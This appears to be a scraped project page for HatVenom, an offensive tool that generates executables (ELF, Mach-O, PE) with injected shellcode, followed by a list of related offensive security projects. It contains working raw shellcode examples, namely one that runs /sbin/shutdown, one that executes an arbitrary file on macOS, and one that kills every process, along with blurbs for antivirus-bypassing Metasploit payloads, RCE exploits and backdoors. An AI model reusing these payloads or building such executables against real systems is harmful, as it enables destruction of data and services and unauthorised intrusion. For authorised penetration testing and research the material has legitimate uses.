HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

Overview

HatVenom

HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

Features

  • Support for most common executable formats like elf, macho, pe.
  • Support for most common architectures like x64, x86, aarch64, armle, mipsle, mipsbe.
  • Ability to modify shellcode by changing pre-defined offsets.

Installation

pip3 install git+https://github.com/EntySec/HatVenom

Basic functions

There are all HatVenom basic functions that can be used to generate payload, covert data or inject shellcode.

  • ip_bytes(ip) - Converts IP address to bytes allowed by shellcode.
  • port_bytes(port) - Converts numeric port to bytes allowed by shellcode.
  • string_bytes(string) - Converts string to bytes allowed by shellcode.
  • generate(file_format, arch, shellcode, offsets={}) - Generates payload for specified target and with specified shellcode.
  • generate_to(file_format, arch, shellcode, offsets={}, filename='a.out') - Generates payload for specified target and with specified shellcode and saves it to the specified file.

Generating payload

It's very easy to generate payload for various targets in HatVenom. Let's generate simple payload that calls shutdown for Linux and save it to a.out.

Examples

from hatvenom import HatVenom

shellcode = (
    b"\x48\x31\xc0\x48\x31\xd2\x50\x6a"
    b"\x77\x66\x68\x6e\x6f\x48\x89\xe3"
    b"\x50\x66\x68\x2d\x68\x48\x89\xe1"
    b"\x50\x49\xb8\x2f\x73\x62\x69\x6e"
    b"\x2f\x2f\x2f\x49\xba\x73\x68\x75"
    b"\x74\x64\x6f\x77\x6e\x41\x52\x41"
    b"\x50\x48\x89\xe7\x52\x53\x51\x57"
    b"\x48\x89\xe6\x48\x83\xc0\x3b\x0f"
    b"\x05"
)

hatvenom = HatVenom()
hatvenom.generate_to('elf', 'x64', shellcode)

Payload offsets

Payload offsets is a variables used to add something to shelcode on the preprocessing stage. Offsets looks like this:

\x90\x90\x90\x90:message:string:\x90\x90\x90\x90

Where message is an offset name and string is an offset type. So the basic usage of the offset looks like:

[shellcode]:[name]:[type]:[shellcode]

There are some possible offsets types:

  • string - Plain text that will be converted to bytes on the preprocessing stage.
  • ip - IP address that will be converted to bytes on the preprocessing stage.
  • port - Numeric port that will be converted to bytes on the preprocessing stage.

So if you want to replace offset with bytes instead of string, ip and port, you can use this type:

[shellcode]:[name]:[shellcode]

Examples

Let's generate simple payload that executes provided through file offset file for macOS and save it to a.out.

from hatvenom import HatVenom

shellcode = (
    b"\x48\x31\xf6\x56\x48\xbf"
    b":file:string:"
    b"\x57\x48\x89\xe7\x48\x31"
    b"\xd2\x48\x31\xc0\xb0\x02"
    b"\x48\xc1\xc8\x28\xb0\x3b"
    b"\x0f\x05"
)

hatvenom = HatVenom()
hatvenom.generate_to('macho', 'x64', shellcode, {'file':'//bin/ps'})

HatVenom CLI

HatVenom also has their own command line interface that can be invoked by executing hatvenom command:

usage: hatvenom [-h] [--format FORMAT] [--arch ARCH] [--shellcode SHELLCODE] [--offsets OFFSETS] [-o OUTPUT] [-l]

Powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

optional arguments:
  -h, --help            show this help message and exit
  --format FORMAT       Platform to generate for.
  --arch ARCH           Architecture to generate for.
  --shellcode SHELLCODE
                        Shellcode to inject.
  --offsets OFFSETS     Shellcode offsets.
  -o OUTPUT, --output OUTPUT
                        File to output generated payload.
  -l, --list            List all formats and platforms.

Examples

Let's generate simple payload that kills all processes for Linux and save it to a.out.

hatvenom --format elf --arch x64 --shellcode "\x6a\x3e\x58\x6a\xff\x5f\x6a\x09\x5e\x0f\x05"

output:

[*] Generating payload...
[i] Final payload size: 131
[*] Saving payload to a.out...
[+] Payload saved to a.out!

NOTE: If you want to use offsets in the CLI version of HatVenom, then you should use --offsets one=1,two=2

You might also like...
对安卓APP注入MSF PAYLOAD,并且对手机管家进行BYPASS。
对安卓APP注入MSF PAYLOAD,并且对手机管家进行BYPASS。

520_APK_HOOK 介绍 将msf生成的payload,注入到一个正常的apk文件中,重新打包后进行加固,bypass手机安全管家的检测。 项目地址: https://github.com/cleverbao/520apkhook 作者: BaoGuo 优点 相比于原始的msf远控,此版本ap

proxyshell payload generate

Py Permutative Encoding https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-pst/5faf4800-645d-49d1-9457-2ac40eb467bd Generate proxyshell

RCE 0-day for GhostScript 9.50 - Payload generator
RCE 0-day for GhostScript 9.50 - Payload generator

RCE-0-day-for-GhostScript-9.50 PoC for RCE 0-day for GhostScript 9.50 - Payload generator The PoC in python generates payload when exploited for a 0-d

Ducky Script is the payload language of Hak5 gear.

Ducky Script is the payload language of Hak5 gear. Since its introduction with the USB Rubber Ducky in 2010, Ducky Script has grown in capability while maintaining simplicity. Aided by Bash for logic and conditional operations, Ducky Script provides multi-vector functions for all Hak5 payload platforms.

Python script that sends CVE-2021-44228 log4j payload requests to url list

scan4log4j Python script that sends CVE-2021-44228 log4j payload requests to url list [VERY BETA] using Supply your url list to urls.txt Put your payl

Dumps the payload.bin image found in Android update images.
Dumps the payload.bin image found in Android update images.

payload dumper Dumps the payload.bin image found in Android update images. Has significant performance gains over other tools due to using multiproces

PyFUD - Fully Undetectable payload generator for metasploit

PyFUD fully Undetectable payload generator for metasploit Usage: pyfud.py --host

Industry ready custom API payload with an easy format for building Python APIs (Django/Django Rest Framework)

Industry ready custom API payload with an easy format for building Python APIs (Django/Django Rest Framework) Yosh! If you are a django backend develo

Automatic SQL injection and database takeover tool
Automatic SQL injection and database takeover tool

sqlmap sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of

Releases(2.0.0)
Owner
EntySec
EntySec is a group of security professionals and software engineers involved in the development of security tools and services.
EntySec
Fast python tool to test apache path traversal CVE-2021-41773 in a List of url

CVE-2021-41773 Fast python tool to test apache path traversal CVE-2021-41773 in a List of url Usage :- create a live urls file and use the flag "-l" p

Zahir Tariq 12 Nov 09, 2022
Generates password lists/dictionaries based on keywords written in python3.

dicbyru Introduction Generates password lists/dictionaries based on keywords. It uses the keywords and adds capital letters, numbers and special chara

ru55o 2 Oct 31, 2022
CVE-2021-21985 VMware vCenter Server远程代码执行漏洞 EXP (更新可回显EXP)

CVE-2021-21985 CVE-2021-21985 EXP 本文以及工具仅限技术分享,严禁用于非法用途,否则产生的一切后果自行承担。 0x01 利用Tomcat RMI RCE 1. VPS启动JNDI监听 1099 端口 rmi需要bypass高版本jdk java -jar JNDIIn

r0cky 355 Aug 03, 2022
The self-hostable proxy tunnel

TTUN Server The self-hostable proxy tunnel. Running Running: docker run -e TUNNEL_DOMAIN=Your tunnel domain -e SECURE=True if using SSL ghcr.io/to

Tom van der Lee 2 Jan 11, 2022
log4j-tools: CVE-2021-44228 poses a serious threat to a wide range of Java-based applications

log4j-tools Quick links Click to find: Inclusions of log4j2 in compiled code Calls to log4j2 in compiled code Calls to log4j2 in source code Overview

JFrog Ltd. 171 Dec 25, 2022
A Tool for subdomain scan with other tools

ReconTracer A Tool for subdomain scan with other tools ReconTracer Find subdomains by using another amazing sources!. Obs: In a close future recontrac

15 Dec 18, 2021
Ini membuat tema berbasis bendera Indonesia with Python + Linux.py

tema Ubah Tema Termux Menjadi Linux Ubah Font Termux Jadi Linux dibuat oleh wahyudioputra INSTALL pkg update && pkg upgrade pkg install python pkg ins

wahyudioputra 2 Nov 30, 2021
🔎 Most Advanced Open Source Intelligence (OSINT) Framework for scanning IP Address, Emails, Websites, Organizations.

🔎 Most Advanced Open Source Intelligence (OSINT) Framework for scanning IP Address, Emails, Websites, Organizations.

BhavKaran 1.5k Dec 28, 2022
Apache OFBiz rmi反序列化EXP(CVE-2021-26295)

Apache OFBiz rmi反序列化EXP(CVE-2021-26295) 目前仅支持nc弹shell 将ysoserial.jar放置在同目录下,py3运行,根据提示输入漏洞url,你的vps地址和端口 第二次使用建议删除exp.ot 本工具仅用于安全测试,禁止未授权非法攻击站点,否则后果自负

15 Nov 09, 2022
CVE-2021-43936 is a critical vulnerability (CVSS3 10.0) leading to Remote Code Execution (RCE) in WebHMI Firmware.

CVE-2021-43936 CVE-2021-43936 is a critical vulnerability (CVSS3 10.0) leading to Remote Code Execution (RCE) in WebHMI Firmware. This vulnerability w

Jeremiasz Pluta 8 Jul 05, 2022
宝塔面板Windows版提权方法

宝塔面板Windows提权方法 本项目整理一些宝塔特性,可以在无漏洞的情况下利用这些特性来增加提权的机会。

298 Dec 14, 2022
Scan all java processes on your host to check weather it's affected by log4j2 remote code execution

Log4j2 Vulnerability Local Scanner (CVE-2021-45046) Log4j 漏洞本地检测脚本,扫描主机上所有java进程,检测是否引入了有漏洞的log4j-core jar包,是否可能遭到远程代码执行攻击(CVE-2021-45046)。上传扫描报告到指定的服

86 Dec 09, 2022
A Python Bytecode Disassembler helping reverse engineers in dissecting Python binaries

A Python Bytecode Disassembler helping reverse engineers in dissecting Python binaries by disassembling and analyzing the compiled python byte-code(.pyc) files across all python versions (including P

neeraj 95 Dec 26, 2022
Crowbar - A windows post exploitation tool

Crowbar - A windows post exploitation tool Status - ✔️ This project is now considered finished. Any updates from now on will most likely be new script

29 Nov 20, 2022
DCSync - DCSync Attack from Outside using Impacket

Adding DCSync Permissions Mostly copypasta from https://github.com/tothi/rbcd-at

n00py 77 Dec 16, 2022
Lite version of my Gatekeeper backdoor for public use.

MayorSec Backdoor Fully functioning bind-type backdoor This backdoor is a fully functioning bind shell and lite version of my full functioning Gatekee

Joe Helle 56 Mar 25, 2022
Cisco RV110w UPnP stack overflow

Cisco RV110W UPnP 0day 分析 前言 最近UPnP比较火,恰好手里有一台Cisco RV110W,在2021年8月份思科官方公布了一个Cisco RV系列关于UPnP的0day,但是具体的细节并没有公布出来。于是想要用手中的设备调试挖掘一下这个漏洞,漏洞的公告可以在官网看到。 准

badmonkey 25 Nov 09, 2022
Get important strings inside [Info.plist] & and Binary file also all output of result it will be saved in [app_binary].json , [app_plist_file].json file

Get important strings inside [Info.plist] & and Binary file also all output of result it will be saved in [app_binary].json , [app_plist_file].json file

12 Sep 28, 2022
How to exploit a double free vulnerability in 2021. 'Use-After-Free for Dummies'

This bug doesn’t exist on x86: Exploiting an ARM-only race condition How to exploit a double free and get a shell. "Use-After-Free for dummies" In thi

Stephen Tong 1.2k Dec 25, 2022
POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL Pre-Auth RCE Injection Vulneralibity.

CVE-2021-26084 Description POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL(Object-Graph Navigation Language) Pre-Auth RCE Injection V

antx 9 Aug 31, 2022